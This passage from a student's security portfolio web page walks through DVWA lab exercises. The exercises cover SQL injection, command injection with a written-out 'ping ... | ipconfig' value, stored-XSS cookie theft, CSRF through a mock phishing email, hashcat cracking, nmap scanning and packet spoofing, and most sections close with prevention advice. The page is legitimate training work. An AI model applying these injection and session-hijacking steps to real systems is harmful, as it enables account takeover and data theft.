          <a href="../../img/portfolio/red/GetUserAndPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetUserAndPass.png" alt=""></a>
          <p>But in this case we won't go after people's credit card information but after there
          password. I know the user table name from the previous query and now I can just try some
          common column names like; username, user, name, those type of things.</p>
          <p>And we got a username and a hash! But now what? The username is simple but the password
          is hashed and can't be just copied and used.</p>
          <a href="../../img/portfolio/red/HashDecrypt.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/HashDecrypt.png" alt=""></a>
          <p>That's were this site comes in. I just insert the md5 hash in this decryptor and it
          checks a big database with common hashes and their decrypted word. And now I have the
          password and I can just login with admin/password.</p>
          <p>So how would you prevent this? The best thing to do is sanitize the queries. Make sure
          all the queries use prepared statements and are parameterised. This prevents people
          inserting for example strings instead of numbers and prevents them from ignoring your
          query and inserting their own.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: SQL injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal9" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Command injection</p>
          <p>I applied sql injection on a ping function in DVWA.</p>
           <a href="img/portfolio/Command%20injection.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/Command%20injection.png" alt=""></a>
          <p>The way this function works is it takes the ip and inserts it directly in a shell. It
          would probably looks like something like this "ping 'INSERTED_IP'".</p>
          <p>Now this little symbol "|" is called a pipe and it can be used to execute multiple
          commands in one line. So I used the "|" to execute my own command after the ping command
          just like shown above.</p>
          <p>I typed in the ip because it still needs to execute the ping command and after that I did
          a "ipconfig" so the command would look like this when executed in the shell: "ping
          185.230.127.234 | ipconfig" This gave us the ip information of the machine the webpage
          is running on.</p>
          <a href="../../img/portfolio/red/CmdCurrentUser.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdCurrentUser.png" alt=""></a>
          <p>I can also get the current user logged in user from the machine using "net user". But
          with "net user" you can do much more even change the password of the current user or
          create a completely new user just for me.</p>
          <a href="../../img/portfolio/red/CmdWifiPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdWifiPass.png" alt=""></a>
          <p>What is maybe even better I can get the wifi password of the connected pc in plain text.
          Now I can connect to the same network because I know the password.</p>
          <a href="../../img/portfolio/red/CmdEnterpriceWifi.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdEnterpriceWifi.png" alt=""></a>
          <p>This trick doesn't work with more advanced wifi security though. Here you see the eduroam
          network from school which is protected with 802.1x control. This doesn't mean you can't
          get the password at all it just makes it a whole lot harder.</p>
          <a href="../../img/portfolio/red/CIDIR.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CIDIR.png" alt=""></a>
          <p>I was also able to run the "dir" command. This tells me a lot about the local machine and
          how the web server is installed.</p>
          <a href="../../img/portfolio/red/CISystemInfo.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CISystemInfo.png" alt=""></a>
          <P>With the "systeminfo" command I'm able to get a lot of information about the physical
          machine which might be useful to me later. It greatly increases my attack surface.</P>
          <p>This can be prevented by sanitizing the input and not just inserting it straight into the
          shell. Make sure it goes to a parameterised function first, check the input and then
          insert it into a shell for example.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Command injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal10" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site scripting</p>
          <p>I will now show you how you could apply XSS to a website.</p>
          <a href="../../img/portfolio/red/XSSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlert.png" alt=""></a>
          <p>First I have to check if the website is vulnerable. The easiest way to check this is just
          to try a simple "Alert" script just like this.</p>
          <a href="../../img/portfolio/red/XSSAlertResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlertResult.png" alt=""></a>
          <p>As you can see the script works so that means that the website is vulnerable to XSS. Now
          I can try something that has some more impact and could actually be useful for me.</p>
          <a href="../../img/portfolio/red/MaxCharLimit.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/MaxCharLimit.png" alt=""></a>
          <p>This form doesn't allow more than 50 characters, so writing bigger scripts might make
          this difficult. Luckily they only validate this in the frontend so I can just inspect
          this page and change the maximum characters in the form. So now I can write some bigger
          scripts that give me more information.</p>
          <a href="../../img/portfolio/red/XSSGetCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>Like getting the cookie of the user so I can hijack their session.</p>
          <a href="../../img/portfolio/red/XSSGetCookieResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>So now I got the cookie it is my own though, but these scripts get stored inside the
          comments and the comments are persistent. Therefore I could also write a script that
          sends the cookie to me instead of displaying it. This way I can make it almost invisible
          for everyone to see and everyone who loads this page their cookie gets send to me.</p>
          <a href="../../img/portfolio/red/XSSOldCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSOldCookie.png" alt=""></a>
          <p>Now I can try to use the cookie that I stole in the previous picture to try and login. As
          you can see my cookie is now different and I'm not logged in.</p>
          <a href="../../img/portfolio/red/XSSNewCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSNewCookie.png" alt=""></a>
          <p>Now I placed the cookie I stole in my own cookie to hopefully make the website think I'm
          the person who is logged in that I stole this cookie from.</p>
          <a href="../../img/portfolio/red/XSSSessionHijack.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSSessionHijack.png" alt=""></a>
          <p>And now when I try to load the index page the website thinks I'm logged in as the person
          the cookie belongs to and I hijacked their session. I can now do everything on their
          account, comment in their name and change their data or steal their data.</p>
          <p>And if this person is by any chance an admin I might be able to do some more extreme
          things as well. Like creating or deleting users or their comments.</p>
          <a href="../../img/portfolio/red/XSSIframe.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframe.png" alt=""></a>
          <P>Sometimes the programmers try to prevent XSS by filtering out the script tags. But they
          forget the filter out all the other HTML tags. So I can load my own website in an
          "Iframe".</P>
          <a href="../../img/portfolio/red/XSSIframeResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframeResult.png" alt=""></a>
          <p>This might only sound as good free marketing but you can also do other things. Like
          redirecting everyone that visits this page to my own website or inject scripts in other
          html tags, so I can still run my scripts even though they banned the script tags.</p>
          <p>These type of attacks can be prevented by sanitizing the input much like SQL injection.
          Make sure that all the text that users can post to the website's frontend doesn't get
          converted to straight HTML. In this way they can't exploit other HTML tags as well.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site scripting</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal11" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site request forgery</p>
          <p>Now I'm going to exploit CSRF on a website. The principles are quite simple, if you see
          the query that is called in the search bar, then the website might be vulnerable.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>As you can see in the search bar the website creates a query. If I would send this query
          without the form it would work as well but only for me. So I need to get this link to an
          user fill in my own password and make him click it.</p>
          <a href="../../img/portfolio/red/CSRFHTMLFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFHTMLFile.png" alt=""></a>
          <p>So I created a little phishing email using HTML. By using HTML I can make the email as
          legit as possible. By hiding the actual link in a text or even adding the DVWA logo. If
          I would know how they normally would send emails to their users, I could fully recreate
          it and you won't see the difference.</p>
          <a href="../../img/portfolio/red/CSRFUserEmail.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFUserEmail.png" alt=""></a>
          <p>The user would get an email like this and if you add urgency to the message, the user
          might not even think about any red flags because they feel the need to act as fast as
          possible.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>Now the user got send to the same page to change your password, but I already changed it
          when it loaded the page.</p>
          <a href="../../img/portfolio/red/CSRFLogin.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLogin.png" alt=""></a>
          <p>Now if the user tries to login he can't because the password is changed, and I can log
          into his account and exploit it as much as I want.</p>
          <p>These type of attacks can be prevented by using things like a CAPTCHA or asking the user
          to fill in their old password. Even though this cannot fully prevent this type of attack
          it will make it a lot harder to succeed</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site request forgery</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal12" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Path traversal</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Path traversal</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal13" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Password cracking</p>
          <p>Now I'm going to show to basics of password cracking.</p>
          <p>
          There are a few main ways to crack passwords
          <ul>
          <li>Brute forcing</li>
          <li>Dictionary attacks</li>
          <li>Rainbow tables</li>
          </ul>
          </p>
          <p>Brute forcing is the most basic way to crack a password, it just tries every possible
          combination of letters. It has a few pros and some big cons.</p>
          <p>Brute forcing is rarely used these days just for the simple reason that cracking a modern
          encrypted password would take more then a lifetime. It also costs a lot of computing
          power because it generates the hashes on the fly and there are a lot of hashes to
          generate and try. The pro is though that it doesn't use any storage space because it
          generates everything instead of getting them for a wordlist. Brute forcing could be an
          option when you know that the password that you're cracking isn't a existing word but
          rather a string of random numbers and letters. Even though brute forcing might be the
          only option in that case, you're probably better off finding another way to get the
          password.</p>
          <p>Dictionary attacks are more sophisticated, it's way more efficient and faster but there a
          big con.</p>
          <p>Dictionary attacks use a predefined list of words and generates hashes for them and then
          compare them to the hash you want to crack to see if any of them match. The pro is that
          this is way faster. The downside on the other hand is that if the password you want to
          crack isn't in the word list you have no chance of success. The dictionary attack could
          be extended by generating multiple versions of every word some with captitals some with
          random numbers after them etc. A dictionary attack could also be made very personal and
          tailored to the specifications of your target. For example adding the targets place of
          work or pet names to the list. Also if you want more chance of success you'll need a
          bigger word list and those can grow pretty fast costing thus a lot of storage space.</p>
          <p>Rainbow tables are in essence a lot like dictionary attacks, but actually better.</p>
          <p>Rainbow tables contain like a dictionary attack a wordlist. The difference is that the
          wordlist is already hashed and could contain all possible solutions making a look like a
          brute force. You could for instance create a rainbow table having every possible
          solution making it a bruto force but more efficient costing less time, or generate
          hashes for your dictionary attack wordlist which might be reusable costing you less time
          in the future. Rainbow tables do come with some downsides like it costs a lot of
          harddisk space, less then a dictionary attack of the same size because it uses lossless
          compression, but if you want a lot of possibilities it will still be a big file. The
          hash type like MD5 or SHA256 is static thus making it less versatile/useful when you
          don't know the encryption type. Same goes for the salt, a salt could be added to the
          list but it will make the file even bigger. A problem that you won't have with a
          dictionary attack or brute force because the hashes get generated in the fly.</p>
          <p>A good way to make encrypted passwords harder to crack is by using a salt or a pepper. A
          salt is random data added to the password before it's hashed, and because it's different
          for every new password it gets stored alongside the password. This has a pro and a con.
          The pro is that the salt is different for every password meaning that if one password
          gets compromised the others are still save. The downside is though that if someone
          breaches the database he will know the salts for each password instantly. Now a pepper
          uses the same method to encrypt a password, it is random data and adds it to the
          password before it's hashed. But a pepper is static and is stored separately from the
          password hashes. Now this method has a pro and con as well. The pro is that if the
          database is breached the hacker won't know the pepper making cracking the passwords a
          lot harder. The con is that if he finds the pepper all the passwords are compromised,
          but to do that he might need to decompile the code and find the pepper, which is a lot
          harder than breaching the database most of the time.</p>
          <a href="../../img/portfolio/red/CrackHashGenerate.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashGenerate.png" alt=""></a>
          <p>I created a small demonstration on hacking a simple MD5 hash. So I first of all created a
          hash for the string "password".</p>
          <a href="../../img/portfolio/red/CrackHashId.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashId.png" alt=""></a>
          <p>If I would have stole this hash from some database I might not know the hash type, which
          is important for me to know if I want to save time or use a rainbow table. So I ran
          "Hash-identifier" and gave it the hash. This gives me an idea what the hash type might
          be.</p>
          <a href="../../img/portfolio/red/CrackHashFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashFile.png" alt=""></a>
          <p>I placed the has in a file. In this case there's only one hash in there but in reality
          this list could contain all the hashes from a certain database.</p>
          <a href="../../img/portfolio/red/CrackHashResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashResult.png" alt=""></a>
          <p>Now I used "Hashcat" to crack the password using a wordlist called "rockyou". This
          wordlist contains the most common password based on data breaches in the past. As you
          can see it cracked the password and it only took 1 second. Do mind that in this case the
          password was high up in the wordlist. The program only went through 0.03% of the entire
          wordlist, if the password was much lower in the list this would take a lot longer.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Password cracking</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal14" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network scanning and enumeration</p>
           <p>To create a demo for this a made up a scenario. The scenario is that I got VPN access to
          a place I want to hack and I want to know how the network looks like. This is no actual
          hack but mere a VPN tunnel to my own home.</p>
          <a href="../../img/portfolio/red/NetworkScanConnVPN.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanConnVPN.png" alt=""></a>
          <p>So I looked up in which IP range I was so I had a clue from which I could continue.</p>
          <a href="../../img/portfolio/red/NetworkScanDone.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDone.png" alt=""></a>
          <p>I did a network scan using NMap in the ip range that I was connected to. As you can see
          on the left hand side there are some machines that came up in the scan which I could
          take a look at.</p>
          <a href="../../img/portfolio/red/NetworkScanTopology.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanTopology.png" alt=""></a>
          <p>I took a look at the topology of the network first. This is a easy way to get an overview
          of the network, all with connected routers, AP's and switches. I can also see in this
          diagram that there are some devices in red which mean they have 6 or more open ports,
          those devices might be more interesting to me</p>
          <a href="../../img/portfolio/red/NetworkScanNASHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASHost.png" alt=""></a>
          <p>I see that this machine is different from the rest, it's the only one running FreeBSD so
          that might be interesting.</p>
          <a href="../../img/portfolio/red/NetworkScanNASPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASPorts.png" alt=""></a>
          <p>This machine has open ports for the smb protocol which could mean this is a NAS. I could
          use this information to go further and get for example access to the samba shares.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterHost.png" alt=""></a>
          <p>Using the before mentioned topology graph I noticed that the router has a lot of open
          ports as well. Getting into a network's router could give me more access to other parts
          of the network.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterPorts.png" alt=""></a>
          <p>Here I can see that the router has some open ports for ssh, telnet and some webserver I
          can poke at.</p>
          <a href="../../img/portfolio/red/NetWorkScanDesktopHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanDesktopHost.png" alt=""></a>
          <p>While looking at the topology graph I saw another machine with a lot of open ports so I
          took a look, and it looks like a windows machine.</p>
          <a href="../../img/portfolio/red/NetworkScanDesktopPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDesktopPorts.png" alt=""></a>
          <p>There are a few different open ports on this machine then other regular desktops. Like a
          MariaDB which I could try to access or take a look at the webserver. The Windows RPC
          protocol is running on an open port which I can utilize to get in because there are some
          known exploits for that.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network scanning and enumeration</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal15" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network sniffing and spoofing</p>
          <p>I will show 2 little demos as a proof of concept.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPSite.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPSite.png" alt=""></a>
          <p>I have a "pi-hole" server running on my network that acts as my home dns server. It has a
          login screen for a dashboard with statistics but it is not HTTPS secured. So I tried
          catching the password with Wireshark while logging in.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPResult.png" alt=""></a>
          <p>When I filter Wireshark to only HTTP and logged in in te website I can see my IP and the
          website's IP. When I open the packet and took a look what's inside, you can see the form
          post with password in plain text. Now this website doesn't hash the password so I can
          see the password in plain text, otherwise I would have seen a hash which I had to
          decrypt to get the password.</p>
          <a href="../../img/portfolio/red/ScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/ScapyPacket.png" alt=""></a>
          <p>I created a fake IPV4 packet using "scapy". I made it so that it looks like the packet is
          coming from google, but It's actually from me and I put my malicious code in it.</p>
          <a href="../../img/portfolio/red/WireSharkScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WireSharkScapyPacket.png" alt=""></a>
          <p>I captured the packet with Wireshark and as you can see the source address is google, but
          when you look in the raw my malicious code is in there.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network sniffing and spoofing</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal16" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Law, Ethics and Responsible Disclosure</p>
          <p>The Ethics are both quite abstract though logical at the same time. The are written in an
          abstract manner in which they could apply to even other things than hacking. Thus making
          it logical as well. Many things you wouldn't do to someone in real life you wouldn't do
          online. I think it's the same point <a href="https://www.youtube.com/watch?v=HmZm8vNHBSU">these</a> guys tried to make,
          except badly executed.</p>
          <P>In my opinion the internet is one of the last few free places there are in the world.
          Though sometimes tightly controlled by governments, look at China or North-Korea, people
          still find ways around the system to express their voices. I agree with the ethics being
          like gentlemen rules, just don't be a dick to someone, don't do anything you wouldn't
          want to be done to yourself. But this doesn't include expressing your opinion even
          though it might hurt some people. On the internet you still got the right to say those
          things the same as people having the right to disagree and say something about it. While
          in the real world when you say something wrong people will call it a form of
          discrimination and you'll get prosecuted. Thus undermining the freedom of speech and
          creating more and more censorship.</P>
          <p>These are the responsible disclosures of companies I compared.</p>
          <ul>
          <li><a href="https://www.google.com/about/appsecurity/">Google</a></li>
          <li><a href="https://support.apple.com/en-us/HT201220">Apple</a></li>
          <li>
          <a href="https://fontys.nl/Over-Fontys/Organisatie-en-sturing/Onze-organisatieNieuw/Regelingen-statuten-en-reglementen/Responsible-disclosure-Fontys-Hogescholen.htm">Fontys</a>
          </li>
          </ul>
          <p>The first things that stood out to me was the rewards. While Google and Apple being big
          corporations reward the people with big sums of money, the Fontys rewards them by
          putting their name on the wall of fame. Looking at other smaller companies it is more
          common to give some merchandise, putting their names on the hall of fame or giving a
          small amount of money compared to the big numbers Google and Apple are giving as
          rewards.</p>
          <p>What they all have in common is that they want a full detailed report of what you did so
          they can reproduce the scenario. They all don't want you to make anything public before
          they had a chance to fix it and don't dig any deeper in sensitive date that is necessary
          to proof the vulnerability.</p>
          <p>They all also state that even though you did anything illegal while proofing the
          vulnerability, if you follow their responsible disclosure and follow their rules they
          won't pursue any legal actions.</p>
          <p>It is quite logical that companies don't prosecute these people and give them rewards
          instead, because if you think about it they will lose far less money when they pay these
          rewards then if they get hacked by a real threat. Looking at <a href="https://www.bugcrowd.com/bug-bounty-list/">this</a> website a lot of
          companies share that same ideology.</p>
          <ul class="list-inline">
          <li>Date: December 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Law, Ethics and Responsible Disclosure</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal17" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Basic hacking process</p>
          <p>First lets talk about the basic hacking process. This is a process most hackers will
          follow when conducting a hack, good or bad. Though good and bad use this process there
          is a key difference between the two.</p>
          <a href="../../img/portfolio/red/hackingstappen.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/hackingstappen.png" alt=""></a>
          <p>These are the basic hacking steps that are needed to conduct a good hack.</p>
          <h3>Intel Gathering</h3>
          <p>Intel gathering is the first step in the basic hacking process. In this step the hacker
          tries to gain as much information on his target as possible. He'll conduct for instance
          a OSINT, go to the physical location of his target and get a feel for the place and
          maybe even use social engineering to call his target and try to extract information.</p>
          <h3>Footprint</h3>
          <p>Now the hacker will conduct a network scan and try to gain as much information on the
          target's network as possible. He needs to find a foothold from which he can continue
          further, think about ip ranges, open ports, OS versions and important servers.</p>
          <h3>Vuln Analysis</h3>
          <p>The hacker will now look for any out of date software or operating systems to use
          exploits on. Whenever he'll find a software version he'll look if there's a CVE entry
          for that he could exploit. He might also use some automated tools to find common
          vulnerabilities for him. The hacker will also try any website for web vulnerabilities
          like SQL injection, command injection, CSRF and XSS.</p>
          <h3>Exploitation</h3>
          <p>Now is time for action. The hacker will use the information and vulnerabilities he found
          in the previous step to use his exploits. Thus gaining access to his target or the
          information he's after. Most ethical hackers/pentesters will stop after this step or not
          even do this step at all because it might result in destabilizing or shutting down the
          targets network.</p>
          <h3>Post Exploitation</h3>
          <p>This step and the following is more applicable to the bad actors out there. Here the
          hacker will extract the data he's after, edit some data, create new accounts and setup
          persistence for a backdoor so he can come back later without going through the same
          process again or have the risk of the target patching the vulnerability he used.</p>
          <h3>Clean Up</h3>
          <p>This step is very important for bad actors to not get caught. Here the hacker will try to
          remove all of his footsteps like logs. Therefore the police or target will not be able
          to track him down or even know what he did in the first place.</p>
          <a href="../../img/portfolio/red/Cyber-Kill-Chain.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/Cyber-Kill-Chain.png" alt=""></a>
          <p>Now this is the cyber kill chain even though it's comparable to the basic hacking process
          there are some differences.</p>
          <h3>Reconnaissance</h3>
          <p>Here the hacker will conduct recon comparable to the intel gathering stage in the basic
          hacking process.</p>
          <h3>Weaponization</h3>
          <p>In this step the hacker is already creating a payload with an exploit to attack his
          target. It is notable that in the cyber killchain they skip the footprint and vuln
          analysis stages.</p>
          <h3>Delivery</h3>
          <p>Now the payload is to be delivered to the target this can be done by phising email,
          rubber ducky and so on. This stage is also not present in the basic hacking process,
          there it's more part of the exploitation stage.</p>
          <h3>Exploitation</h3>
          <p>When the payload is delivered the hacker will activate his attack.</p>
          <h3>Installation</h3>
          <p>In this stage the hacker will install for example malware to create persistence for a
          backdoor or to act more stealthy. This would happen in the post exploitation stage in
          the basic hacking process.</p>
          <h3>Command & Control</h3>
          <p>Now the installed malware will call back to the command and control system and give the
          hacker control of the hacked system. This can be both part of the exploitation and post
          exploitation stage in the basic hacking process.</p>
          <h3>Actions on Objectives</h3>
          <p>Here the hacker will do whatever his intentions were.</p>
          <h4>The minimal requirements for a good pentest contract and pentest report</h4>
          <p>In a good pentest contract there should be a clearly defined scope and procedures in case
          of emergency. The contract should also include a confidentiality agreement. The pentest
          report should include the scope and goal of the project with the findings and how it was
          done. It should be explained very carefully and readable for people that weren't aware
          of the project. The most important thing is ofcourse the advice to give to the company,
          this way they'll be able to fix any security leaks and the pentest was a success.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Basic hacking process</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal18" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Self reflection</p>
          <p>The semester started quite slowly for me. It wasn't really clear for me were I should
          start and were I should look for the right information. This semester was quite
          different from the defending one. In the defending semester everything went quite easy
          and smooth and I had a clear goal that I wanted to achieve, I felt like I missed that
          this semester, hens why it didn't start so smoothly.</p>
          <p>I started this semester with absolutely no knowledge in hacking into things. I learned
          quite a lot this semester, must of the things I learned listening to podcasts and
          understanding the different concepts and trying different things on DVWA.</p>
          <p>I still don't really feel like I could actually conduct a good pentest and find some
          decent results after this semester which I think sucks, because I feel like I should. I
          do think I've the knowledge but I feel like I lack the How-to. I did think I would be
          quite good at defending a network and building one after previous semester, so I think
           it's a combination between a lack of goals and guidance.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Self reflection</li>
          </ul>
